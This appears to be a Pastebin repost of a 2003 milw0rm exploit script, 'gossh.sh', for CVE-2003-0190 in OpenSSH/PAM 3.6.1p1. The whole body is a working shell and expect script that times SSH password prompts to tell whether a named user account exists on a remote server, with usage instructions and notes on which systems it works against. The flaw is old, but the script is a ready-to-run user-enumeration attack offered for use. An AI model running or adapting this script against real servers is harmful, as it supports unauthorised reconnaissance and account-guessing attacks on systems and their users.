Advertisement
FlyFar

OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident - CVE-2003-0190

Jan 24th, 2024
614
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.80 KB | Cybersecurity | 0 0
  1. #!/bin/sh
  2. # OpenSSH <= 3.6.p1 - User Identification.
  3. # Nicolas Couture - nc@stormvault.net
  4. #
  5. # Description:
  6. #   -Tells you wether or not a user exist on
  7. #     a distant server running OpenSSH.
  8. #
  9. # Usage:
  10. #   -You NEED to have the host's public key
  11. #     before executing this script.
  12. #
  13.  
  14. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
  15. # Fact Sheet:                    #
  16. #     o It is really accurate against    #
  17. #       redhat boxes.            #
  18. #     o Linux boxes running grsecurity   #
  19. #       has 10 seconds delay on both     #
  20. #       valid AND invalid user login     #
  21. #       attempts.                #
  22. #     o *BSD boxes are not vulnerables and   #
  23. #        always has 10 seconds delay like    #
  24. #        Linux-Grsec + network protection    #
  25. #                        #
  26. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
  27.  
  28. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
  29. # History:               
  30. #    Thu May  1 15:41:18 EDT 2003  
  31. #     ; Script started.    
  32. #    Thu May  1 16:42:30 EDT 2003  
  33. #     ; Script is functional.                
  34. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
  35.  
  36. # Let the user know how we work.
  37. usage(){
  38.  echo "$0 <user> <host>"
  39.  exit 1
  40. }
  41.  
  42. # Verify the arguments.
  43. [ $# != 2 ] && usage
  44.  
  45. # Variables.
  46. USER="$1"
  47. HOST="$2"
  48.  
  49. #=-=-=-=-=-=-=-=-=-=-=-=-=#
  50. # Expect script functions         #
  51. #=-=-=-=-=-=-=-=-=-=-=-=-=#
  52.  
  53. # Expect script for password.
  54. expasswd() {
  55. cat << EOF > expasswd
  56. spawn $SSHCMD
  57. expect password:
  58. send '\r'
  59. interact
  60. EOF
  61. }
  62.  
  63. # Expect script for error.
  64. experror() {
  65. cat << EOF > experror
  66. spawn expect -f expasswd
  67. expect again.
  68. exit 1593
  69. interact
  70. EOF
  71. }
  72.  
  73. #=-=-=-=-=-=-=-=-=-=#
  74. # -Fake user timing      #
  75. #=-=-=-=-=-=-=-=-=-=#
  76.  
  77. # OpenSSH client command for inexisting user.
  78. export SSHCMD="ssh nicolas_couture@$HOST"
  79.  
  80. # Build new expect script.
  81. expasswd
  82. experror
  83.  
  84. # Timing.
  85. FDATE0=`date '+%s'`
  86. echo "[-] Calculating fake user timeout..."
  87. expect -f experror 1> /dev/null 2> /dev/null
  88. FDATE1=`date '+%s'`
  89.  
  90. # Fake user timeout.
  91. FUTO=`echo $FDATE1 - $FDATE0 | bc`
  92. echo "[+] Found $FUTO."
  93.  
  94. #=-=-=-=-=-=-=-=#
  95. # -$USER timing    #
  96. #=-=-=-=-=-=-=-=#
  97.  
  98. # OpenSSH command.
  99. export SSHCMD="ssh $USER@$HOST"
  100.  
  101. # Build new expect scripts.
  102. expasswd
  103. experror
  104.  
  105. DATE0=`date '+%s'`
  106. echo "[-] Calculating $USER timeout on $SERVER..."
  107. expect -f experror 1> /dev/null 2> /dev/null
  108. DATE1=`date '+%s'`
  109.  
  110. # $USER timeout.
  111. END=`echo $DATE1 - $DATE0 | bc`
  112. echo "[+] Found $END."
  113.  
  114. #=-=-=-=-=#
  115. # -Result    #
  116. #=-=-=-=-=#
  117.  
  118. if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
  119.  echo "This box is not vulnerable."
  120.  exit 1
  121. fi
  122.  
  123. # Use of our magic skills.
  124. if [ "$FUTO" -lt "$END" ]; then
  125.  echo "$USER exist on $HOST."
  126. elif [ "$FUTO" -ge "$END" ]; then
  127.  echo "$USER doesn't exist on $HOST."
  128. else
  129.  echo "Segmentation fault."
  130.  exit 13
  131. fi
  132.  
  133. # Remove tmp files.
  134. rm -rf expasswd experror
  135.  
  136. # EOF
  137.  
  138. # milw0rm.com [2003-05-02]
  139.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement